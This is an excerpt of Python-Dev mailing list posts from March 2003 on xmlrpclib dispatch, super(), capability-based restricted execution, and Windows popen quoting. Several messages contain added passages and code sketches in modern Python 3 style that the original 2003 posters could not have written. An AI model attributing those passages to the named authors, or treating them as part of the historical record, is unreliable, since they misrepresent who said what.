In-Reply-To: <2mk7fc20bp.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0303061209280.7291-100000@korak.zope.com>

On Thu, 6 Mar 2003, Michael Hudson wrote:

> "Raymond Hettinger" <raymond.hettinger@verizon.net> writes:
> 
> [snip stuff I agree with]
> 
> > Comment generously, the best modules are an education to read.
> 
> This one I have mild issues with.  Ideally, your code is so clear that
> it requires no comments to read!  And information for users of the
> code should be in docstrings.  If you're implementing a non-obvious
> algorithm then there's a place for a comment block educating the
> reader how it works, but I'm leery of anything that might seem to
> encourage the
> 
>     i = i + 1 # add one to i
> 
> school of commenting.

I expect that _sometimes_ some code cannot be clear, even on occasions
when the algorithm is not, as a whole, particularly abstruse.  I
agree, though, that unnecessary comments are harmful.  How about
framing it like this:

  Comment obscure code, let the obvious speak for itself.

-- 
Ken
klm@zope.com


From fdrake@acm.org  Thu Mar  6 17:19:47 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 6 Mar 2003 12:19:47 -0500
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
References: <15975.31848.141376.614323@montanaro.dyndns.org>
 <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
Message-ID: <15975.33587.890152.791815@grendel.zope.com>

Bill Bumgarner writes:
 > It had been closed or moved out of the SF bug queue by Fred about the 
 > same time he left python-dev, I believe.     I had sent the 
 > HTTPTransport source to Fred, but that sounds like a dead end these 
 > days.

Sorry; I've just been really busy on other things.  I'm on python-dev
these days, though I skim the messages very quickly.

 > Found it: 648658
...
 > I haven't tested, but looking at the implementation, I don't think it 
 > will.

I wish you were wrong on this, but I don't think you are.  ;-(

 > In my case, I'm using xmlrpclib in the context of a Cocoa/Python based 
 > application that frequently uses Objective-C sourced strings as a part 
 > of the RPC request.  The PyObjC bridge now bridges NSStrings as a 
 > subclass of unicode.
...
 > So, no, it doesn't do subclasses properly.  The workaround [for me] was 
 > easy... and bogus:
 > 
 > import xmlrpclib
 > Marshaller.dispatch[type(NSString.stringWithString_(''))] = 
 > Marshaller.dispatch[type(u'')]

Yeah, not too pretty.

For things like this, where some manner of dispatch is needed based on
type, but the type itself doesn't provide some appropriate method,
there's a real problem associating the right bit of code, and I'm
quite torn as to the right approach to take.  ;-(


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From skip@pobox.com  Thu Mar  6 17:35:00 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 6 Mar 2003 11:35:00 -0600
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <15975.33587.890152.791815@grendel.zope.com>
References: <15975.31848.141376.614323@montanaro.dyndns.org>
 <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
 <15975.33587.890152.791815@grendel.zope.com>
Message-ID: <15975.34500.180179.410897@montanaro.dyndns.org>

    Fred> For things like this, where some manner of dispatch is needed
    Fred> based on type, but the type itself doesn't provide some
    Fred> appropriate method, there's a real problem associating the right
    Fred> bit of code, and I'm quite torn as to the right approach to take.

Slower in some cases, but couldn't you walk up the __bases__ chain until you
pop off the top or hit a match in the dispatch dict?
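
A minimal sketch of that idea, written for current Python 3 and using a toy class rather than the real xmlrpclib code: the lookup walks the type's method resolution order and takes the first entry found in the dispatch dict. The Marshaller below is a stand-in that returns strings and does no escaping, and NSString here is just a plain str subclass standing in for the bridged type.

```python
class Marshaller:
    """Toy stand-in for xmlrpclib.Marshaller; only the dispatch lookup matters."""

    dispatch = {}

    def dump_string(self, value):
        return "<value><string>%s</string></value>" % value
    dispatch[str] = dump_string

    def dump_int(self, value):
        return "<value><int>%d</int></value>" % value
    dispatch[int] = dump_int

    def dump(self, value):
        # Walk from the most derived class towards object and use the
        # first class that has a registered handler.
        for klass in type(value).__mro__:
            handler = self.dispatch.get(klass)
            if handler is not None:
                return handler(self, value)
        raise TypeError("cannot marshal %s objects" % type(value))


class NSString(str):
    """Stand-in for a bridged string type that subclasses the built-in one."""


m = Marshaller()
print(m.dump(NSString("hello")))
print(m.dump(42))
```

One caveat with this design: any subclass silently inherits its parent's handler, so a bool would be marshalled by the int handler unless bool gets its own entry. Exact-type matches still cost a single dict lookup, since the type itself comes first in the MRO.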

For stuff like the NSString stuff, perhaps adding a registration function to
the marshaller would be appropriate.  Of course, there's the problem coming
out the other side.  Does it matter if you put in a subclass of str and get
out a plain old str?

Also, xmlrpclib is built to take advantage of a number of speedup helper
modules.  In production usage I've found it unbearably slow if used without
sgmlop, for example.  I'd hate to have the default situation work and have
it fail if a speedup module was added to the system.

Skip


From pedronis@bluewin.ch  Thu Mar  6 17:21:40 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Thu, 6 Mar 2003 18:21:40 +0100
Subject: [Python-Dev] super() bug (?)
Message-ID: <009e01c2e404$da3677c0$6d94fea9@newmexico>

>>> class C(object):
...  def f(self): pass
...
>>> class D(C): pass
...
>>> D.f
<unbound method D.f>
>>> super(D,D).f
<bound method D.f of <class '__main__.D'>>

I think this should produce the same thing as D.f,

that means implementation-wise

f.__get__(None,D) should be called

not f.__get__(D,D).

_.__get__(None,D) would still do the right thing for static AND class methods:

>>> def g(cls): pass
...
>>> classmethod(g).__get__(None,D)
<bound method type.g of <class '__main__.D'>>


From bbum@codefab.com  Thu Mar  6 17:48:22 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 12:48:22 -0500
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <15975.33587.890152.791815@grendel.zope.com>
Message-ID: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 12:19 US/Eastern, Fred L. Drake, Jr. wrote:
> I wish you were wrong on this, but I don't think you are.  ;-(

Fred:  I apologize [publicly]..... my bad.   I was mistaking you for 
the other Fred.

In any case, let me know what I can do to contribute to the effort.

b.bum


From fdrake@acm.org  Thu Mar  6 18:05:18 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 6 Mar 2003 13:05:18 -0500
Subject: [Python-Dev] Re: xmlrpclib: Apology
In-Reply-To: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
References: <15975.33587.890152.791815@grendel.zope.com>
 <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
Message-ID: <15975.36318.538470.221747@grendel.zope.com>

Bill Bumgarner writes:
 > On Thursday, Mar 6, 2003, at 12:19 US/Eastern, Fred L. Drake, Jr. wrote:
 > > I wish you were wrong on this, but I don't think you are.  ;-(
 > 
 > Fred:  I apologize [publicly]..... my bad.   I was mistaking you for 
 > the other Fred.

Aha!  Yeah, I think both Fredrik and myself have been transmogrified
into black holes, even though you meant Fredrik.

 > In any case, let me know what I can do to contribute to the effort.

Well, patches are cool.  ;-)  I still have a number of other things that
need to be dealt with in other projects, though I'm glad to help
out with xmlrpclib.  (There are definitely some Expat matters to deal
with.)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From tim.one@comcast.net  Thu Mar  6 18:42:33 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 06 Mar 2003 13:42:33 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEDFFBAA.tim.one@comcast.net>

[Kevin Jacobs]
> How many people run the regression suite with 'network' enabled?

FYI, I always do on Windows, unless I'm running tests on an unconnected
laptop.


From erik@pythonware.com  Thu Mar  6 18:59:28 2003
From: erik@pythonware.com (erik heneryd)
Date: Thu, 06 Mar 2003 19:59:28 +0100
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
References: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
Message-ID: <3E679A90.7030403@pythonware.com>

Bill Bumgarner wrote:

> Fred:  I apologize [publicly]..... my bad.   I was mistaking you for 
> the other Fred. 

In Sweden, Fred is not a very common nickname for Fredrik. In fact I 
don't know if I ever heard of a Fred-Fredrik. This includes the bot 
himself, who just smiles when someone calls him Fred (or Frederick or 
something). :-)

        Erik


From bbum@codefab.com  Thu Mar  6 18:55:59 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 13:55:59 -0500
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <3E679A90.7030403@pythonware.com>
Message-ID: <44DEFB74-5005-11D7-BF05-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 13:59 US/Eastern, erik heneryd wrote:
> In Sweden, Fred is not a very common nickname for Fredrik. In fact I 
> don't know if I ever heard of a Fred-Fredrik. This includes the bot 
> himself, who just smiles when someone calls him Fred (or Frederick or 
> something). :-)

I'm just a hillbilly from the midwest of the US... I wouldn't know. ;-)


From jeremy@zope.com  Thu Mar  6 20:14:17 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 06 Mar 2003 15:14:17 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <3E635BD3.9000107@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
Message-ID: <1046981657.15348.80.camel@slothrop.zope.com>

On Mon, 2003-03-03 at 08:42, Ben Laurie wrote:
> > I think the fundamental problem for rexec is that you don't have a
> > security kernel.  The code for security gets scattered throughout the
> > interpreter.  It's hard to have much assurance in the security when
> > it's tangled up with everything else in the language.
> > 
> > You can use a proxy for an object to deal with goal #1 above --
> > enforce an interface for an object.  I think about this much like a
> > hardware capability architecture.  The protected objects live in the
> > capability segment and regular code can't access them directly.  The
> > only access is via a proxy object that is bound to the capability.
> > 
> > Regardless of proxy vs. rexec, I'd be interested to hear what you
> > think about a sound way to engineer a secure Python.
> 
> I'm told that proxies actually rely on rexec, too. So, I guess whichever 
> approach you take, you need rexec.
> 
> The problem is that although you can think about proxies as being like a 
> segmented architecture, you have to enforce that segmentation. And that 
> means doing so throughout the interpreter, doesn't it? I suppose it 
> might be possible to abstract things in some way to make that less 
> widespread, but probably not without having an adverse impact on speed.

The boundary between the interpreter and the proxy is the generic type
object API.  The Python code does not know anything about the
representation of a proxy object, except that it is a PyObject *.  As a
result, the only way to invoke operations on it is to go through the
various APIs in the type object's table of function pointers.

There are surely limits to how far the separation can go.  I expect you
can't inherit from a proxy for a class, such that the base class is in a
different protection domain than the subclass.  But I think there are
fewer ad hoc restrictions than there are in rexec.

I think this provides a pretty clean separation of concerns, even if the
proxy object were a standard part of Python.  The only code that should
manipulate the proxy representation is its implementation.  The only
other step would be to convince yourself that Python does not inspect
arbitrary parts of a concrete PyObject * in an unsafe way.

Jeremy


From ben@algroup.co.uk  Fri Mar  7 14:21:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Fri, 07 Mar 2003 14:21:40 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <1046981657.15348.80.camel@slothrop.zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>	 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>	 <15933.30607.900530.370402@localhost.localdomain>	 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
Message-ID: <3E68AAF4.3060508@algroup.co.uk>

Jeremy Hylton wrote:
> On Mon, 2003-03-03 at 08:42, Ben Laurie wrote:
> 
>>>I think the fundamental problem for rexec is that you don't have a
>>>security kernel.  The code for security gets scattered throughout the
>>>interpreter.  It's hard to have much assurance in the security when
>>>it's tangled up with everything else in the language.
>>>
>>>You can use a proxy for an object to deal with goal #1 above --
>>>enforce an interface for an object.  I think about this much like a
>>>hardware capability architecture.  The protected objects live in the
>>>capability segment and regular code can't access them directly.  The
>>>only access is via a proxy object that is bound to the capability.
>>>
>>>Regardless of proxy vs. rexec, I'd be interested to hear what you
>>>think about a sound way to engineer a secure Python.
>>
>>I'm told that proxies actually rely on rexec, too. So, I guess whichever 
>>approach you take, you need rexec.
>>
>>The problem is that although you can think about proxies as being like a 
>>segmented architecture, you have to enforce that segmentation. And that 
>>means doing so throughout the interpreter, doesn't it? I suppose it 
>>might be possible to abstract things in some way to make that less 
>>widespread, but probably not without having an adverse impact on speed.
> 
> 
> The boundary between the interpreter and the proxy is the generic type
> object API.  The Python code does not know anything about the
> representation of a proxy object, except that it is a PyObject *.  As a
> result, the only way to invoke operations on it is to go through the
> various APIs in the type object's table of function pointers.
> 
> There are surely limits to how far the separation can go.  I expect you
> can't inherit from a proxy for a class, such that the base class is in a
> different protection domain than the subclass.  But I think there are
> fewer ad hoc restrictions than there are in rexec.
> 
> I think this provides a pretty clean separation of concerns, even if the
> proxy object were a standard part of Python.  The only code that should
> manipulate the proxy representation is its implementation.  The only
> other step would be to convince yourself that Python does not inspect
> arbitrary parts of a concrete PyObject * in an unsafe way.

I'm obviously missing something - surely you can say pretty much exactly 
the same thing about a bound method, just replace "type object" with 
"PyMethodObject"?

And in either case, you also need to restrict access to the underlying 
libraries and (presumably) some of the builtin functions?

BTW, Guido pointed out to me that I'm causing confusion by saying 
"rexec" when I really mean "restricted execution".

In short, it seems to me that proxies and capabilities via bound methods 
both do the same basic thing: i.e. prevent inspection of what is behind 
the capability/proxy. Proxies add access control to decide whether you 
get to use them or not, whereas in a capability system simple possession 
of the capability is sufficient (i.e. they are like a proxy where the 
security check always says "yes"). You do access control using 
capabilities, instead of inside them.

Am I not understanding proxies?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Fri Mar  7 17:41:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 07 Mar 2003 12:41:16 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Fri, 07 Mar 2003 15:42:13 GMT."
 <3E68BDD5.5020608@algroup.co.uk>
Message-ID: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>

[Moving a discussion about capabilities to where it arguably belongs]

[Ben Laurie]
> The point about capabilities is that mere possession of a capability is 
> all that is required to exercise it. If you start adding security 
> checkers to them, then you don't have capabilities anymore. But the 
> point is somewhat deeper than that - given capabilities, you can 
> implement proxies without requiring any more infrastructure - you can 
> also implement security schemes that don't really correspond to any kind 
> of security checking at all (ok, you can probably find some convoluted 
> way to achieve the same effect, but I'll bet it comes down to having 
> tokens that correspond to proxies, and security checkers that allow you 
> to proceed if you have the appropriate token - in other words, 
> capabilities, but very hard to use).
> 
> So, it seems to me, it's simpler and more powerful to start with 
> capabilities and build proxies on top of them (or whatever alternate 
> scheme you want to build).
> 
> Once more, my apologies for not just getting straight to the point.
> 
> BTW, if you would like to explain why you don't think bound methods are 
> the way to go on python-dev, I'd love to hear it.

It seems to be a matter of convenience.  Often objects have many
methods to which you want to provide access as a group.  E.g. I might
have a service configuration registry object.  The object behaves
roughly like a dictionary.  A certain user may be given read-only
access to the registry.  Using capabilities, I would have to hand her
a bunch of capabilities for various methods: __getitem__, has_key,
get, keys, items, values, and many more.  Using proxies I can simply
give her a read-only proxy for the object.  So proxies are more
powerful.

Before you start saying that we should use capabilities as the more
fundamental mechanism and build proxies on top of that: as you point
out, we already have an equivalent more fundamental mechanism, bound
methods, which is equivalent to capabilities.  It's just that raw
capabilities aren't very usable, so one way or another we've got to
build something on top of that.
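
To make the contrast concrete, here is a small sketch in modern Python 3 (an
assumption; it is not code from this thread).  Registry and ReadOnlyProxy are
hypothetical names.  The proxy keeps only bound methods of the registry,
i.e. raw capabilities, and regroups the read-only ones behind one object.
Plain Python does not hide attributes such as a bound method's __self__, so
this only illustrates the shape of the idea and is not a security boundary.

```python
class Registry(object):
    """Dictionary-like configuration registry (hypothetical)."""

    def __init__(self):
        self._data = {}

    def __getitem__(self, key):
        return self._data[key]

    def __setitem__(self, key, value):
        self._data[key] = value

    def get(self, key, default=None):
        return self._data.get(key, default)

    def keys(self):
        return list(self._data)


class ReadOnlyProxy(object):
    """Bundles several read capabilities behind a single object."""

    def __init__(self, target):
        # Hold only bound methods, never the target itself.
        self._getitem = target.__getitem__
        self._get = target.get
        self._keys = target.keys

    def __getitem__(self, key):
        return self._getitem(key)

    def get(self, key, default=None):
        return self._get(key, default)

    def keys(self):
        return self._keys()


registry = Registry()
registry["port"] = 8080

read_item = registry.__getitem__   # a single raw capability
proxy = ReadOnlyProxy(registry)    # the same kind of access, grouped

try:
    proxy["port"] = 9090           # no __setitem__ was handed out
    write_allowed = True
except TypeError:
    write_allowed = False
```

Handing out read_item alone covers one operation; the proxy covers the whole
read-only group with one object, which is the convenience argument above.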

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar  7 19:42:12 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 07 Mar 2003 14:42:12 -0500
Subject: [Python-Dev] super() bug (?)
In-Reply-To: "Your message of Thu, 06 Mar 2003 18:21:40 +0100."
 <009e01c2e404$da3677c0$6d94fea9@newmexico>
References: <009e01c2e404$da3677c0$6d94fea9@newmexico>
Message-ID: <200303071942.h27JgCq23992@pcp02138704pcs.reston01.va.comcast.net>

[Samuele]
> >>> class C(object):
> ...  def f(self): pass
> ...
> >>> class D(C): pass
> ...
> >>> D.f
> <unbound method D.f>
> >>> super(D,D).f
> <bound method D.f of <class '__main__.D'>>
> 
> I think this should produce the same thing as D.f,

Really?  It makes no sense either way though.  super(D, D) only makes
sense from inside a class method; there the first argument should be
the current class and the second should be the cls argument to the
class method, e.g.:

  class C(object):
    def cm(cls): pass
    cm = classmethod(cm)

  class D(C):
    def cm(cls):
      super(D, cls).cm() # ~Same as C.cm(cls)

And this works.
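
For reference, a runnable sketch of the same pattern in modern Python 3 (an
assumption: decorator syntax did not exist when this was written).  Here D.cm
is wrapped as a class method too, and the return strings and the extra
subclass E are added only to make the flow visible.

```python
class C(object):
    @classmethod
    def cm(cls):
        return "C.cm got " + cls.__name__


class D(C):
    @classmethod
    def cm(cls):
        # Delegates to C.cm, but still passes the original cls along.
        return "D.cm -> " + super(D, cls).cm()


class E(D):
    pass


from_d = D.cm()
from_e = E.cm()
```

Calling through E shows why the second argument to super() is cls rather
than a hard-coded class: C.cm still receives E.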

I should also mention that super() should really only be used to call
a method with the same name as the currently called method -- I see
no use case for using super() with another method.

> that means implementation-wise
> 
> f.__get__(None,D) should be called
> 
> not f.__get__(D,D).
> 
> _.__get__(None,D) would still do the right thing for static AND class methods:
> 
> >>> def g(cls): pass
> ...
> >>> classmethod(g).__get__(None,D)
> <bound method type.g of <class '__main__.D'>>

It shouldn't be terribly hard to detect this situation and fix it
(somewhere in super_init()) but unless you have a use case I'd
rather consider this as a "don't care" situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Fri Mar  7 19:47:18 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Fri, 7 Mar 2003 20:47:18 +0100
Subject: [Python-Dev] super() bug (?)
References: <009e01c2e404$da3677c0$6d94fea9@newmexico> <200303071942.h27JgCq23992@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <02d701c2e4e2$5d214b00$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
> [Samuele]
> > >>> class C(object):
> > ...  def f(self): pass
> > ...
> > >>> class D(C): pass
> > ...
> > >>> D.f
> > <unbound method D.f>
> > >>> super(D,D).f
> > <bound method D.f of <class '__main__.D'>>
> >
> > I think this should produce the same thing as D.f,
>
> Really?  It makes no sense either way though.

It was sloppily phrased: super(D,D).f should return the same value as C.f, that
means an unbound method like D.f.

> super(D, D) only makes
> sense from inside a class method; there the first argument should be
> the current class and the second should be the cls argument to the
> class method, e.g.:
>
>   class C(object):
>     def cm(cls): pass
>     cm = classmethod(cm)
>
>   class D(C):
>     def cm(cls):
>       super(D, cls).cm() # ~Same as C.cm(cls)

you mean C.cm()


> And this works.
>
> I should also mention that super() should really only be used to call
> a method with the same name as the currently called method -- I see
> no use case for using super() with another method.

>
> It shouldn't be terribly hard to detect this situation and fix it
> (somewhere in super_init()) but unless you have a use case I'd
> rather consider this as a "don't care" situation.
>

no, but passing D,D even to a classmethod's __get__ works but is conceptually
bogus,

btw the clarifying example Python impl for super semantics at

http://www.python.org/2.2.2/descrintro.html#cooperation

is broken wrt classmethods.


From tim.one@comcast.net  Fri Mar  7 21:03:36 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 16:03:36 -0500
Subject: [Python-Dev] test_popen broken on Win2K
Message-ID: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>

Someone changed test_popen to "quote" the path to python:

    cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable, cmdline)
           ^  ^

The double-quote characters above the carets are new.

This causes test_popen to fail on Win2K, but not on Win98.  The relevant
difference appears to be the default shell (cmd.exe on the former,
command.com on the latter).

Simplified example, on Win2K:

>>> p = os.popen('python -c "print 666"')
>>> p.read()
'666\n'
>>> p.close()
>>>

Worked fine, but doesn't if python is quoted:

>>> p = os.popen('"python" -c "print 666"')
>>> p.read()
''
>>> p.close()
1
>>>

The same kind of behavior can be observed directly from a DOS-box prompt:

C:\Code\python\PCbuild>cmd /c python -c "print 666"
666

C:\Code\python\PCbuild>

Worked fine, but quoting the program name flops:

C:\Code\python\PCbuild>cmd /c "python" -c "print 666"
'python" -c "print' is not recognized as an internal or external command,
operable program or batch file.

C:\Code\python\PCbuild>

So it looks like it stripped off the first and last double-quote characters,
leaving two senseless double-quote characters "in the middle".

From the docs for cmd.exe:

"""
If /C or /K is specified, then the remainder of the command line after
the switch is processed as a command line, where the following logic is
used to process quote (") characters:

    1.  If all of the following conditions are met, then quote characters
        on the command line are preserved:

        - no /S switch
        - exactly two quote characters
        - no special characters between the two quote characters,
          where special is one of: &<>()@^|
        - there are one or more whitespace characters between the
          the two quote characters
        - the string between the two quote characters is the name
          of an executable file.

    2.  Otherwise, old behavior is to see if the first character is
        a quote character and if so, strip the leading character and
        remove the last quote character on the command line, preserving
        any text after the last quote character.
"""

We're apparently in case #2, if for no other reason than that there
aren't "exactly two quote characters".
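
A toy model of rule 2 as worded in the docs quoted above, in modern Python 3
(an assumption).  strip_outer_quotes is a hypothetical helper; it does not
implement rule 1 and is in no way the real cmd.exe parser.  It only
reproduces the "strip the leading quote, remove the last quote" step.

```python
def strip_outer_quotes(cmdline):
    """Model rule 2: drop a leading quote and the last quote on the line."""
    if not cmdline.startswith('"'):
        return cmdline
    rest = cmdline[1:]
    last = rest.rfind('"')
    if last == -1:
        return rest
    # Text after the last quote character is preserved.
    return rest[:last] + rest[last + 1:]


seen_by_shell = strip_outer_quotes('"python" -c "print 666"')
unquoted = strip_outer_quotes('python -c "print 666"')
```

Applied to the failing command, the model leaves the two inner quotes
stranded in the middle, which matches the program name cmd.exe complained
about in the DOS-box session.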

I'll check in a hack to worm around this in the test, but anyone who can do
better, please do (I won't have access to a Win2K box next week).


From nas@python.ca  Fri Mar  7 21:21:18 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 7 Mar 2003 13:21:18 -0800
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <20030307212117.GG13770@glacier.arctrix.com>

Tim Peters wrote:
> Someone changed test_popen to "quote" the path to python:
> 
>     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> cmdline)
>            ^  ^
> 
> The double-quote characters above the carets are new.

Having to quote arguments to popen and system is a pet peeve of mine.
99% of the time I don't want or need the shell.  Is it possible to
write versions of system() and popen() that do not use the shell on
Windows?  I know it's possible on Unix systems.  It would be really nice
if both popen() and system() could take a sequence for the command and
arguments in addition to a string.
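
For readers on current Python: the subprocess module, which was added to the
standard library after this thread, accepts the command as a sequence and
does not involve the shell by default.  A minimal sketch, assuming Python 3.7
or later (for capture_output); run_without_shell is a hypothetical helper
name.

```python
import subprocess
import sys


def run_without_shell(argv):
    """Run argv (a list of strings) directly and return its stdout as text."""
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout


# Each list element reaches the child as one argument, so the caller does
# not write any shell quoting, even if sys.executable contains spaces.
output = run_without_shell([sys.executable, "-c", "print(666)"])
```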

  Neil


From theller@python.net  Fri Mar  7 21:48:29 2003
From: theller@python.net (Thomas Heller)
Date: 07 Mar 2003 22:48:29 +0100
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <d6l2alw2.fsf@python.net>

Tim Peters <tim.one@comcast.net> writes:

> Someone changed test_popen to "quote" the path to python:
> 
>     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> cmdline)
>            ^  ^
> 
> The double-quote characters above the carets are new.
> 
> This causes test_popen to fail on Win2K, but not on Win98.  The relevant
> difference appears to be the default shell (cmd.exe on the former,
> command.com on the latter).

In distutils we had a similar problem. I don't remember the details
at the moment exactly, but I think enclosing sys.executable in double
quotes *only* when it contains spaces should do the trick.

Thomas


From tim.one@comcast.net  Fri Mar  7 22:02:23 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 17:02:23 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEMDFBAA.tim.one@comcast.net>

[Thomas Heller]
> ...
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

That's what I checked in, but doubt it works in general.  The cmdline
test_popen passes to cmd.exe would have 4 double-quote characters then, and
the docs I quoted clearly say it falls into the second case then (so it
would strip the first and last quotes, leaving the second and third, which
don't make sense anymore).  The trick would work if the executable path were
the only quoted thing on the cmdline.


From tim.one@comcast.net  Fri Mar  7 22:16:21 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 17:16:21 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030307212117.GG13770@glacier.arctrix.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net>

[Neil Schemenauer]
> Having to quote arguments to popen and system is a pet peeve of mine.
> 99% of the time I don't want or need the shell.  Is it possible to
> write versions of system() and popen() that do not use the shell on
> Windows?  I know it's possible on Unix systems.  It would be really nice
> if both popen() and system() could take a sequence for the command and
> arguments in addition to a string.

Those would be quite different functions, then, unless you proposed to have
Python interpret native shell metacharacters on its own too (e.g., set up
pipes, do the indicated file redirections, interpolate envars, and fake
whatever other shell gimmicks people may use).

The spawn family of functions take a list of arguments and are sometimes
more convenient.  IIRC, though, on Windows the MS spawn implementation
pastes them back into a cmdline, and then you get some *really* bizarre
quoting problems.

I always thought Tcl's "exec" cmd was worthy of stealing.  That defines a
sh-like syntax for specifying OS commands, but arranges to interpret them
the same way on all platforms (so, e.g, "2>&1" redirects stderr to stdout
even on Win95; last I looked, there were thousands of lines in the Tcl
implementation devoted to making this command work).


From altis@semi-retired.com  Fri Mar  7 22:31:21 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Fri, 7 Mar 2003 14:31:21 -0800
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <KJEOLDOPMIDKCMJDCNDPAEBDDBAA.altis@semi-retired.com>

> From: Thomas Heller
>
> Tim Peters <tim.one@comcast.net> writes:
>
> > Someone changed test_popen to "quote" the path to python:
> >
> >     cmd = '"%s" -c "import sys;print sys.argv" %s' % (sys.executable,
> > cmdline)
> >            ^  ^
> >
> > The double-quote characters above the carets are new.
> >
> > This causes test_popen to fail on Win2K, but not on Win98.  The relevant
> > difference appears to be the default shell (cmd.exe on the former,
> > command.com on the latter).
>
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

My example isn't for popen, but this sounds familiar. There are a few places
where I had to do things like this for some Win98 folks that installed
'Python22' into 'C:\Program Files\' instead of at 'C:\':

        if ' ' in sys.executable:
            python = '"' + sys.executable + '"'
        else:
            python = sys.executable
        os.spawnv(os.P_NOWAIT, python, [python, filename])

There have also been some quoting issues with arguments like filename, and
I'm still not sure that all the cases on various versions of Windows,
Mac OS X, and Linux work correctly all the time.

David Ascher is on vacation, otherwise he could tell us all about the
process.py module and how it relates to these issues :)

ka


From dave@boost-consulting.com  Sat Mar  8 02:04:42 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Fri, 07 Mar 2003 21:04:42 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
Message-ID: <u1y1isjet.fsf@boost-consulting.com>

The following change in behavior is causing one of my tests to fail.
Is it intentional?  Should isinstance(int(x),int) really ever return
False?


$ python
Python 2.2.2 (#1, Feb  3 2003, 14:10:37)
[GCC 3.2 20020927 (prerelease)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> int(sys.maxint * 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OverflowError: long int too large to convert to int
>>> exit
'Use Ctrl-D (i.e. EOF) to exit.'
>>>

dave@penguin ~
